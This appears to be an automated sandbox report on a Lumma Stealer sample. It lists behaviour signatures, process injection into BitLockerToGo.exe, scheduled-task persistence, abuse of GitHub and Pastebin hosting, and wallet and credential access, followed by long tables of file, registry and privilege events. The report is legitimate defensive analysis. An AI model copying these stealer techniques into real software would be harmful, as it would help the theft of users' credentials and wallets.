Malware Analysis Report

2024-11-15 06:26

Sample ID 240705-tl4statenh
Target [email protected]
SHA256 7da7d152162fd0a796b93b2f28715c50b577ac71a1107b668dc6b2834a5602ba
Tags
lumma discovery execution persistence privilege_escalation spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7da7d152162fd0a796b93b2f28715c50b577ac71a1107b668dc6b2834a5602ba

Threat Level: Known bad

The file [email protected] was found to be: Known bad.

Malicious Activity Summary

lumma discovery execution persistence privilege_escalation spyware stealer

Lumma Stealer

Downloads MZ/PE file

Loads dropped DLL

Executes dropped EXE

Event Triggered Execution: Component Object Model Hijacking

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Power Settings

Suspicious use of SetThreadContext

Drops file in Program Files directory

Command and Scripting Interpreter: PowerShell

Unsigned PE

Enumerates physical storage devices

Scheduled Task/Job: Scheduled Task

Modifies data under HKEY_USERS

Views/modifies file attributes

Modifies registry class

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SendNotifyMessage

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Enumerates system info in registry

Opens file in notepad (likely ransom note)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-05 16:10

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-05 16:09

Reported

2024-07-05 16:15

Platform

win10-20240404-en

Max time kernel

210s

Max time network

211s

Command Line

"C:\Users\Admin\AppData\Local\Temp\[email protected]"

Signatures

Lumma Stealer

stealer lumma

Downloads MZ/PE file

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Power Settings

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4180 set thread context of 5104 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\7-Zip\Lang\tk.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\uz-cyrl.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ext.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fi.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\gu.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ps.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\es.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\et.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\id.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mr.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sr-spc.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\bg.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ga.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\it.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ka.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\nl.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sq.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ar.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tt.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sl.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7zFM.exe C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\da.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7z.dll C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\br.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\pt.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\yo.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\is.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\cs.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\hi.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ne.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Uninstall.exe C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\History.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fr.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ko.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\mng.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\tg.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\zh-tw.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\af.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\cy.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fy.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\io.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ba.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\bn.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\fa.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\readme.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7-zip.chm C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\an.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\co.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\he.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\az.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\be.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sa.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ro.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\sw.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7-zip.dll C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ca.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\el.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\eu.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ms.txt C:\Users\Admin\Downloads\7z2407-x64.exe N/A
File opened for modification C:\Program Files\7-Zip\7-zip32.dll C:\Users\Admin\Downloads\7z2407-x64.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133646696155449468" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2407-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2407-x64.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4180 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4180 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4180 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4180 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 4180 wrote to memory of 5104 N/A C:\Users\Admin\AppData\Local\Temp\[email protected] C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
PID 5104 wrote to memory of 3656 N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe
PID 5104 wrote to memory of 3656 N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe
PID 5104 wrote to memory of 3656 N/A C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe
PID 3656 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe C:\Windows\system32\cmd.exe
PID 3656 wrote to memory of 212 N/A C:\Users\Admin\AppData\Local\Temp\IB09LDVLDAJ403CDRKJDXWOYJOFBB6.exe C:\Windows\system32\cmd.exe
PID 212 wrote to memory of 4808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 212 wrote to memory of 4808 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\mode.com
PID 212 wrote to memory of 4796 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 4796 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 4272 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
PID 212 wrote to memory of 4272 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\main\7z.exe
